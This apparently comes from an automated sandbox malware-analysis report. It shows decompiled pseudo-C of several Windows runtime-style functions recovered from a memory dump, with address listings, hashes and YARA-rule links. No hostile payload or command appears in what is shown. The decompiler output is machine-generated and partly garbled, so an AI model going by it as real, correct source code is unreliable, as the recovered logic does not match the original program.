Instruction Fuzzy Hash: 1E716B75A00609EFDF11DFA5C984AAEFBB9FF48710F14446AE905EB250DB30EA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 036AB8D0, Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E036AB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x3707b9c; // 0x0
				_t124 = L03634620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E03659800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E036595B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E036595D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L036377F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E03659910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E036595D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x3707b9c; // 0x0
									_t92 = L03634620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E03659910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0361A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E036AE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E036AE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E036595B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x036ab8d9
0x036ab8e4
0x00000000
0x036ab8e6
0x036ab8f3
0x036ab8f5
0x036ab8f5
0x036ab8f8
0x036ab920
0x036ab924
0x036ab936
0x036ab939
0x036ab93d
0x036ab948
0x036ab9a0
0x036ab9a0
0x036ab9a4
0x036ab9bf
0x036ab9c4
0x036ab9c6
0x036ab9cd
0x036ab9d1
0x036abad4
0x036abad8
0x036abada
0x036abadc
0x036abadc
0x036abadf
0x036abae0
0x036abae2
0x036abae4
0x036abaec
0x036abaee
0x036abaf0
0x036abaf0
0x036abaec
0x036abafb
0x036abafc
0x036abafe
0x036abb01
0x036abb01
0x00000000
0x036abb06
0x036ab9d7
0x036ab9db
0x036ab9db
0x036ab9de
0x036ab9de
0x036ab9e4
0x036ab9e7
0x036ab9ea
0x036ab9ec
0x036ab9ef
0x036ab9f3
0x036aba1b
0x036aba1b
0x036aba23
0x036aba24
0x036aba27
0x036aba2a
0x036aba2b
0x036aba2e
0x036aba30
0x036aba37
0x036aba3f
0x036aba9c
0x036abaa2
0x036abb13
0x036abb15
0x036abaae
0x036abaae
0x036abab3
0x036abab5
0x036ababa
0x036abac8
0x036abac8
0x036ababa
0x036abacd
0x036abacf
0x00000000
0x036abacf
0x036abb1a
0x00000000
0x036abb1c
0x036abaa7
0x036abb11
0x00000000
0x036abb11
0x036abaa9
0x00000000
0x00000000
0x00000000
0x00000000
0x036aba41
0x036aba41
0x036aba41
0x036aba58
0x036aba5d
0x036aba62
0x00000000
0x00000000
0x036aba64
0x036aba67
0x036aba68
0x036aba69
0x036aba6c
0x036aba6f
0x036aba71
0x036aba78
0x036aba80
0x00000000
0x00000000
0x036aba90
0x036aba90
0x036aba97
0x00000000
0x036aba97
0x036ab9f5
0x036ab9f7
0x036ab9f7
0x036ab9fa
0x036aba03
0x036aba07
0x036aba0c
0x036aba10
0x036aba17
0x00000000
0x036ab9f7
0x036ab9a6
0x036ab9a8
0x036ab9af
0x036ab9b3
0x00000000
0x00000000
0x036ab9b9
0x00000000
0x036ab9b9
0x036ab94d
0x036ab98f
0x036ab995
0x036ab999
0x036ab960
0x036ab967
0x036ab968
0x036ab96a
0x00000000
0x036ab96a
0x036ab99b
0x036ab99e
0x00000000
0x00000000
0x00000000
0x036ab99e
0x036ab951
0x036ab954
0x036ab95a
0x036ab95e
0x036ab972
0x036ab979
0x036ab97d
0x036ab97f
0x036ab980
0x036ab982
0x036ab984
0x00000000
0x036ab984
0x00000000
0x036ab926
0x00000000
0x036ab926

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55f613a1ad2bf4321acc24c252227034598af2d93b72fa79a647c4113d64bef1
Instruction ID: 30f0a108abd75268145ab93290855c3191622040c7fc604a5bac3daeab76c8b4
Opcode Fuzzy Hash: 55f613a1ad2bf4321acc24c252227034598af2d93b72fa79a647c4113d64bef1
Instruction Fuzzy Hash: 0471CB36240B01AFD721DF28CA44F66BBF9EB45720F18492CEA558B6A0DBB5ED41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 036152A5, Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E036152A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0362EEF0(0x37079a0);
					_t104 =  *0x3708210; // 0x2bb2bb0
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					_t2 = _t104 + 8; // 0x28000000
					 *((intOrPtr*)(_t108 + 0x18)) =  *_t2;
					E0362EB70(_t93, 0x37079a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_t10 = _t104 + 4; // 0x0
							_push( *_t10);
							_t53 = E03659890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0362EEF0(0x37079a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0362EB70(0, 0x37079a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t11 = _t104 + 0xe; // 0xbb2bc802
								_t13 = _t104 + 0xc; // 0x2bb2bbd
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0364F0BF(_t13,  *_t11 & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0362EEF0(0x37079a0);
									__eflags =  *0x3708210 - _t104; // 0x2bb2bb0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x3708210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t37 = _t104 + 0x10; // 0x2002bb2b
											_t95 =  *((intOrPtr*)( *_t37));
											E03694888(_t89,  *((intOrPtr*)( *_t37)), __eflags);
										}
										E0362EB70(_t95, 0x37079a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_t38 = _t104 + 4; // 0x0
											_push( *_t38);
											E036595D0();
											L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_t41 = _t104 + 4; // 0x0
											_push( *_t41);
											E036595D0();
											L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0362EB70(_t93, 0x37079a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_t25 = _t104 + 4; // 0x0
										_push( *_t25);
										E036595D0();
										L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E036595D0();
										L036377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t15 = _t104 + 0x10; // 0x2002bb2b
								_t93 =  &_v20;
								_t17 = _t104 + 0xe; // 0xbb2bc802
								 *((intOrPtr*)(_t108 + 0x20)) =  *_t15;
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0364F0BF( &_v20,  *_t17 & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

0x036152a5
0x036152ad
0x036152b0
0x036152b3
0x036152b7
0x036152ba
0x036152bf
0x036152c4
0x036152cc
0x00000000
0x00000000
0x036152ce
0x036152d1
0x036152d9
0x036152dd
0x036152e7
0x036152f7
0x036152f9
0x036152fd
0x03670dcf
0x03670dd5
0x03670dd6
0x03670dd7
0x03670dd8
0x03670dd9
0x03670dde
0x03670ddf
0x03670de0
0x03670de1
0x03670de2
0x03670de2
0x03670de5
0x03670dea
0x03670dec
0x03670f60
0x03670f64
0x03670f70
0x03670f76
0x03670f79
0x03670f79
0x00000000
0x03670f64
0x03670df2
0x03670df7
0x03670e04
0x03670e04
0x03670e0d
0x03670e0d
0x03670e10
0x03670e1a
0x03670e1c
0x03670e4c
0x03670e52
0x03670e61
0x03670e67
0x03670e6b
0x03670e70
0x03670e76
0x03670ed7
0x03670edc
0x03670ee0
0x03670ee6
0x03670eea
0x03670eed
0x03670ef0
0x03670ef3
0x03670ef6
0x03670ef9
0x03670efb
0x03670efe
0x03670f01
0x03670f01
0x03670f0b
0x03670f12
0x03670f16
0x03670f18
0x03670f18
0x03670f1b
0x03670f2c
0x03670f31
0x03670f31
0x03670f35
0x03670f39
0x03670f3a
0x03670f3c
0x03670f3c
0x03670f3f
0x03670f50
0x03670f55
0x03670f55
0x03670f59
0x036152eb
0x036152f1
0x036152f1
0x03670e7d
0x03670e84
0x03670e88
0x03670e8a
0x03670e8a
0x03670e8d
0x03670e9e
0x03670ea3
0x03670ea3
0x03670ea7
0x03670eaf
0x03670eb3
0x03670eb9
0x03670eb9
0x03670ebc
0x03670ecd
0x03670ecd
0x00000000
0x03670eb3
0x03670e1e
0x03670e21
0x03670e25
0x03670e2b
0x03670e2f
0x03670e30
0x03670e3a
0x03670e3f
0x03670e41
0x00000000
0x00000000
0x03670e47
0x00000000
0x03670e47
0x03670df9
0x03670dfe
0x00000000
0x00000000
0x00000000
0x03670dfe
0x03615303
0x03615307
0x00000000
0x03615309
0x00000000
0x03615309
0x03615307
0x036152e9
0x036152e9
0x00000000
0x036152e9
0x0361530e
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cc7f64e7288bd02e290fb85032ab324ddbb9110a5c3c214e798f79c64ff98ab
Instruction ID: 79fa4ab73b0a97777c9b24e42feb137ad4e89e854b7de045dfb2999d55af2841
Opcode Fuzzy Hash: 7cc7f64e7288bd02e290fb85032ab324ddbb9110a5c3c214e798f79c64ff98ab
Instruction Fuzzy Hash: F351BA75205741ABC721EF64C940B27FBE8FF80710F18092EF8968B651E774E850CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 03642AE4, Relevance: .2, Instructions: 159
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E03642AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x3708204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x3708208; // 0x3708207
				_t8 = _t57 + 0x3708208; // 0x3708207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x3708450; // 0x2bb173a
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x370821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x3706d5c; // 0x7f0e0654
							_t72 =  *0x3706d5c; // 0x7f0e0654
							_t75 =  *0x3706d5c; // 0x7f0e0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x3706d5c; // 0x7f0e0654
							_t84 =  *0x3706d5c; // 0x7f0e0654
							_t87 =  *0x3706d5c; // 0x7f0e0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0365F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x03642ae4
0x03642aec
0x03642aef
0x03642af4
0x03642af7
0x03642afd
0x03642b92
0x03642b92
0x03642b97
0x03642b9c
0x03642b9c
0x03642b03
0x03642b06
0x03642b09
0x03642b09
0x03642b0f
0x03642b15
0x03642b15
0x03642b1b
0x03642b1e
0x03642b21
0x03642b26
0x03642b29
0x03642b81
0x03642b84
0x03642c0e
0x03642c15
0x03642c24
0x03642c24
0x03642b8a
0x03642b8a
0x03642b8a
0x03642b8a
0x03642b90
0x00000000
0x00000000
0x00000000
0x00000000
0x03642b4a
0x03642b4a
0x03642b4d
0x03642b53
0x00000000
0x00000000
0x03642b55
0x03642b58
0x03642bb7
0x03685d1b
0x03685d37
0x03685d47
0x03685d53
0x03642bbd
0x03642bbd
0x03642bbd
0x03642bb7
0x03642b5d
0x03642c2f
0x03685d5b
0x03685d77
0x03685d87
0x03685d93
0x03642c35
0x03642c35
0x03642c35
0x03642c2f
0x03642b65
0x03642b9f
0x03642ba2
0x03642b67
0x03642b67
0x03642b69
0x03642b6b
0x03642b6e
0x03642bc9
0x03642bcc
0x03642bcf
0x03642bd4
0x03642bd6
0x03642bd6
0x03642bdb
0x03642c02
0x03642c05
0x03642c07
0x00000000
0x03642c07
0x03642be0
0x03642c00
0x03642c3f
0x03642c3f
0x00000000
0x03642c00
0x03642be5
0x03642be7
0x03642bec
0x03642bf4
0x03642bf6
0x00000000
0x03642bf6
0x03642b70
0x03642b76
0x03642b2b
0x03642b2b
0x03642b2d
0x03642b2f
0x03642b32
0x03642b35
0x03642b3a
0x00000000
0x03642b40
0x03642b43
0x03642b45
0x03642b47
0x03642b4a
0x03642b4d
0x03642b53
0x00000000
0x00000000
0x00000000
0x03642b53
0x03642b78
0x03642b78
0x03642b7b
0x03642b7e
0x00000000
0x03642b7e
0x03642b76
0x03642ba5
0x03642ba5
0x03642ba8
0x03642bad
0x00000000
0x00000000
0x03642baf
0x03642baf
0x03642bc2
0x00000000

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99b672b5e987ea0c53a84d771a4c5d4506a668b638dcab943780c46e0fb07c12
Instruction ID: fdc6f5ed17fcd640877d93d222ece5374890bbecce8065f5390ee3bef775c713
Opcode Fuzzy Hash: 99b672b5e987ea0c53a84d771a4c5d4506a668b638dcab943780c46e0fb07c12
Instruction Fuzzy Hash: FC51A176E00115CFCB14DF1CC8A09BEB7B5FB88708725895AF856EB314DB34AA51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 036DAE44, Relevance: .2, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E036DAE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E036DC38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E036DACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E036DFDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E036DEA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E03637D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E036D1608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E036E1536(0x3708ae4, (_t74 -  *0x3708b04 >> 0x14) + (_t74 -  *0x3708b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L036DC323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E036DA80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E036BCB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E036DACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}

0x036dae44
0x036dae4c
0x036dae53
0x036dae55
0x036dae5c
0x036dae64
0x036dae68
0x036dae75
0x036dae75
0x036dae78
0x036dae7a
0x036dae7c
0x036dae7f
0x036daea8
0x036daeab
0x036daead
0x00000000
0x00000000
0x036daeb3
0x036daeb8
0x036daebb
0x036daebd
0x00000000
0x036dae81
0x036dae88
0x036dae8f
0x036dae9b
0x036dae96
0x036dae96
0x036dae96
0x036daea0
0x036daea3
0x036daebf
0x036daebf
0x036daec3
0x036daec9
0x036daf0d
0x036daf14
0x036daf3d
0x036daf3d
0x036daf41
0x036daf44
0x036daf67
0x036daf67
0x036daf6a
0x036dafca
0x036dafd1
0x00000000
0x036dafd1
0x036daf6c
0x036daf6d
0x036daf75
0x036daf7c
0x036daf7e
0x036daf80
0x036daf85
0x036daf87
0x036daf99
0x036daf89
0x036daf92
0x036daf92
0x036daf9e
0x036dafa1
0x036dafa3
0x036dafa9
0x036dafb0
0x036dafb2
0x036dafb4
0x036dafbc
0x036dafbc
0x036dafb4
0x036dafb0
0x00000000
0x036dafa1
0x036daf4f
0x036daf57
0x036daf5c
0x036daf5e
0x00000000
0x00000000
0x036daf60
0x036daf64
0x036daf64
0x00000000
0x036daf64
0x036daf1a
0x036daf25
0x00000000
0x00000000
0x036daf27
0x036daf28
0x036daf33
0x00000000
0x036daed0
0x036daed0
0x036daed2
0x036daee1
0x036daee4
0x00000000
0x00000000
0x036daee6
0x036daeec
0x00000000
0x00000000
0x036daefb
0x036daf07
0x036dafd3
0x036dafdb
0x036dafdb
0x00000000
0x036daf07
0x036daed6
0x036daed8
0x036daedf
0x00000000
0x00000000
0x00000000
0x036daedf
0x036daec9

Memory Dump Source

Source File: 0000000A.00000002.473940932.00000000035F0000.00000040.00000001.sdmp, Offset: 035F0000, based on PE: true

Associated: 0000000A.00000002.475043393.000000000370B000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.475079693.000000000370F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
